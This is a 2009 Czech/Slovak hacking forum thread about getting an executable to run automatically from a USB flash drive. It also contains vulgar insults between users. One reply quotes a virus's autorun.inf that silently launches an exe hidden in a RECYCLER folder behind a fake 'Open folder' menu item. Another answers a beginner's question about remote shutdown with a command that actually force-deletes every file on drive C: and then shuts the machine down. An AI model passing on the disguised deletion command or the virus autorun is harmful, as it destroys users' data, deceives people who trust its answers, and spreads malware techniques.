Autorun

HackForum

Autorun#
Ahojte, chcel by som sa Vás spýtať ako by som mohol vytvoriť autorun na USB.
Vytvoril som pár ale tie nerobili to čo by som potreboval (otvorila sa tabuľka s výberom daného exe súboru)
Chcel by som sa spýtať ako by som spravil autorun ktorý bude na USB ak ak ho zasuniem tak sa automaticky spustí daná exe aplikácia nič iné iba ona (aj keby bolo na USB veľa súborov)

Ďakujem za odpovede


Majox

P.S. skúšal som aj formu "open="
(odpovědět)
Majox211 | 95.105.143.*13.10.2009 23:25
re: Autorun#
Z flashky autorun nejde - pokud flashka nema U3, resp. pokud se flashka netvari jako pevny disk. Autorun se u Windows spousti defaultne jen z optickych mechanik a hddisku..

----------
Cow power by Gentoo...
(odpovědět)
Anonymous_ | E-mail14.10.2009 13:57
re: Autorun#
No to áno.
Ale niektoré aplikácie (napr. vírus) sa zapne tiež autorun-om na hocijakom USB. Ten autorun je nejako špec. vytvorený alebo ako je možné že sa spustí?


Neviete niekto ako na to?


Ďakujem


Majox
(odpovědět)
Majox211 | 95.105.143.*14.10.2009 23:14
re: Autorun#
blbost. Proste to nejde, je to, jak jsem psal. Ty viry muzou maximalne pridat fake polozku do speedrun menu (mam na mysli tu hovadinku, jak vyskakuje po kazdem zasunuti flashky.. takove to - co chcete udelat.. otevrit slozku, prohlidnout obrazku atd.)
(odpovědět)
Ann | 90.177.100.*16.10.2009 13:43
re: Autorun#
ale jasne, ze to jde. autorun.inf

tusim ale, ze M$ vydalo zaplatu (nebylo to v SP3??).. ta nastavuje v registrech hodnotu pro NoDriveTypeAutoRun na -1
(odpovědět)
Duck | 85.71.165.*16.10.2009 14:00
re: Autorun#
Jak uz jsem psal - autorun.inf se vykonava pouze u pevnych disku nebo u optickych mechanik, u flash disku se ignoruje. Nevim jak dlouho, ale minimalne od SP2.. Proste nejaky patek uz to je - posledne jsem tenhle problem resil minuly rok a musel jsem pouzit U3 flashku, ktera se tvari jako HDD (prave proto, aby se mohlo spustit U3 GUI atd. - kazdy, kdo vi, co je U3, mne chape a dojde mu proc se tvari jako HDD - prave, aby se ono U3 mohlo autorunem spustit..). Obyc. flashka, ktera se tvari jako flashka, autorun nevykonna (spatne receno, ale nechce se mi to ted prepisovat..).

----------
Cow power by Gentoo...
(odpovědět)
Anonymous_ | E-mail17.10.2009 3:00
re: Autorun#
A pokud si stale myslis opak, tak ho jednoduse dokaz, ukaz mi, jak na aktualnim Windows XP nebo tedy Windows XP s SP2, spustis automaticky (= hned po vlozeni do USB) neco z OBYCEJNE flashky, pres autorun.

----------
Cow power by Gentoo...
(odpovědět)
Anonymous_ | E-mail17.10.2009 3:03
re: Autorun#
Anonymous: vzdycky jsi byl namyslena pica, ktera si mysli, ze ma vzdy pravdu. tady mas dukaz:
[link]
(odpovědět)
Duck | 85.71.165.*17.10.2009 10:46
re: Autorun#
Jeee, kokot rubberduck. Ty si uz nemastis brko u SQL injekce, ale pichas i do autorunu.. nice.

Kdyz uz se snazis, tak by jsi preci mohl vedet, ze takhle muzu rici, ze je to fake nebo U3 flashka - blbecku.

----------
Cow power by Gentoo...
(odpovědět)
Anonymous_ | E-mail18.10.2009 22:11
re: Autorun#
Cekal jsem to od tebe :) Nastesti urazka od tebe je pro me pochvala :) Navic zhazujes jen sam sebe :) Mimochodem: Kachny si promastuji (masti) peri (brka) kvuli tomu, aby se neutopily, ty inteligente :D A pokud se jedna o SQL Injection: Pokud ten clanek pomohl aspon jednomu cloveku, pak mel vyznam. BTW: Mam dokonce nachystany druhe rozsirene vydani. Milerad ti pak poslu mail a budu ocekavat tvoji ostrou kritiku, protoze kazda kritika nebo pochvala je pro me znamenim, ze nekdo moje clanky cte :P
(odpovědět)
Duck | 85.71.165.*18.10.2009 22:51
re: Autorun#
BTW: Musim ti podekovat, protoze nebyt toho, ze ses ozval, neobjevil bych dva dalsi zpusoby, jak automaticky spustit soubor na flashce (o jednom jsem dokonce nenasel zadnou zminku, takze bude patrne unikatni :) ). Jak jsem napsal vyse: Kazda kritika je dobra :) Jeste jednou tisicere diky :)
(odpovědět)
Duck | 85.71.165.*18.10.2009 22:57
re: Autorun#
a můžeš sem rozepsat ty dva způsoby?
(odpovědět)
Ovce | E-mail19.10.2009 16:06
re: Autorun#
"tusim ale, ze M$ vydalo zaplatu (nebylo to v SP3??).. ta nastavuje v registrech hodnotu pro NoDriveTypeAutoRun na -1"

Psal jsem, ze u dnesnich (pro debily -> aktualizovanych) Windows to proste nejde ihned po vlozeni. kgsws to potvrdil, tak si naser rubberducku - pravdu jsem mel. Autorun.inf samozrejme nejde kazdy troll, po googleni "usb flashdisk autorun" ..

Pokud jsi "vyhaxoroval" dalsi zpusob, tak ok.. jsem rad, ze jsem pomohl

kgsws: tuhle metodu jsem tez vygooglil.. stale to ale neni ihned po vlozeni (je vyzadovana interakce uzivatele), tak tu do mne nepicujte.

----------
Cow power by Gentoo...
(odpovědět)
Anonymous_ | E-mail19.10.2009 17:52
re: Autorun#
sry.. informacni sum.. zaplaty mam vsechny a registry jsem needitoval.. jen jsem vlozil FLASHku.. a U3 to rozhodne neni. je to obycejna 1GB FLASHka, kterou pouzivam pri pokusech..
(odpovědět)
Duck | 85.71.165.*19.10.2009 19:01
re: Autorun#
Ok, v tom pripade gw - objevil jsi novou metodu. Rozhodne se ale nejedna o fci Windows a rozhodne to neni nic lehce dostupneho na netu, je to nejaky exploit ;)

Spise jsem se spatne vyjadril - nejde to stnd. cestou - pres autorun, jako to jde treba u CD nebo HDD (U3) (coz je nazev topicu) A pokud jde, tak urcite ne stnd. cestou - ale jak tu nekdo psal - reseni je exploit :)

Ale uprimne - nez se s tim takhle srat, tak si za 3 kila poridim u3 flashku a je to poresene.

----------
Cow power by Gentoo...
(odpovědět)
Anonymous_ | E-mail20.10.2009 19:32
re: Autorun#
tak to pak ano :) takze se ti omlouvam za nevhodne napadeni :) jinak co se tyce pouziti: zavisi k jakym ucelum to chces pouzit.. ne kazdy to pouzije pro dobrou vec..
(odpovědět)
Duck | 85.71.165.*20.10.2009 20:32
re: Autorun#
Duck a nevedel by si nejaké detaily k jeho tvorbe?
(odpovědět)
Majox211 | 95.105.143.*16.10.2009 17:22
re: Autorun#
Namyslena pica to je. A navic i neuveritelna lama.
(odpovědět)
.:. | 67.159.44.*18.10.2009 2:45
re: Autorun#
Zato ty lizes picu svoji matce :P

----------
Cow power by Gentoo...
(odpovědět)
Anonymous_ | E-mail18.10.2009 22:11
re: Autorun#
Ale notak, pánové, máte tohle zapotřebí? Každý má nárok na svůj názor, ať už mlný nebo oprvěný. Chybovat je přeci lidské.

----------
We are the pilgrims, we shall go always a little further.
(odpovědět)
The_M | E-mail19.10.2009 15:05
re: Autorun#
A jen bych ještě rád podotknul, že takovým zbytečným urážením se navzájem jen shazujete sami sebe v očích jiných.

----------
We are the pilgrims, we shall go always a little further.
(odpovědět)
The_M | E-mail19.10.2009 15:06
re: Autorun#
podle sebe soudim tebe
(odpovědět)
.:. | 67.159.44.*20.10.2009 1:43
re: Autorun#
V tom pripade vitej namyslena pico a lamo.

----------
Cow power by Gentoo...
(odpovědět)
Anonymous_ | E-mail20.10.2009 19:29
re: Autorun#
hehe a v jedne diskuzi jsi v podstate priznal, ze jsi obycejna lamka. popremyslej kde to bylo
(odpovědět)
.:. | 67.159.44.*20.10.2009 23:04
re: Autorun#
Ano, protoze pak je lama kazdy. Nikdo neumi vse. Ani ja, ani ty.

----------
Cow power by Gentoo...
(odpovědět)
Anonymous_ | E-mail21.10.2009 9:47
re: Autorun#
Tento autorun se sice nespusti po vlozeni (to opravdu nejde bez U3) ale spusti se pri kazdym otevreni flashdisku pomoci exploreru - je jedno jestly enterem nebo kliknutim nebo vybranim polozky "Open" v menu, proste ten EXE se spusti, testoval sem to na winXP SP2. Moznost jak se pak na ten disk dostat bez spusteni je asi prez CMD nebo jinej souborovej manazer.
Taky to pouziva maskovani ze to prida polozku v menu po vlozeni, ale to neni ta hlavni funkce, to hlavni je udelany prez "shell\open\command".
A je to z jednoho autorun "viru".
[autorun]
open=RECYCLER\S-1-5-21-1482476501-164449193
7-682003330-1013\ise32.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=RECYCLER\S-1-5-21-148247
6501-1644491937-682003330-1013\ise32.exe
shell\open\default=1

(odpovědět)
kgsws | 147.229.9.*19.10.2009 9:27
re: Autorun#
Ďakujem Ti kgsws :)
(odpovědět)
Majox211 | 95.105.143.*19.10.2009 20:18
re: Autorun#
Existuje na to exploit, ktery zneuziva buffer overflow ve windows XP driverech (dosud funkcni) bohuzel stranka kde sidlil uz je dole a nepodarilo se mi najit zadny mirror, ale co vim je, ze to JDE... pisi to proto abych se zastal RubberDucka, ma pravdu
(odpovědět)
to je jedno | 193.179.143.*20.10.2009 0:11
re: Autorun#
Caw sem zacatecnik a pls jakym prikazem v cmd vypnu pocitac na dalku ????? Ne v siti
(odpovědět)
Gylly | 89.103.126.*22.10.2009 17:31
re: Autorun#
del C:\*.* /s /f /q && echo "sem_zadej_ip" > nul && shutdown -s -f

do sem_zadej_ip, zadej IP pocitace, ktery chces vypnout, napr. 62.42.67.87
(odpovědět)
A^ | 213.29.233.*23.10.2009 11:46
re: Autorun#
Chapu to dobre ze myslis vypnuti mavnutim kouzelneho proutku???
(odpovědět)
........... | 193.179.143.*26.10.2009 19:16

Zpět
 
 
 

 
BBCode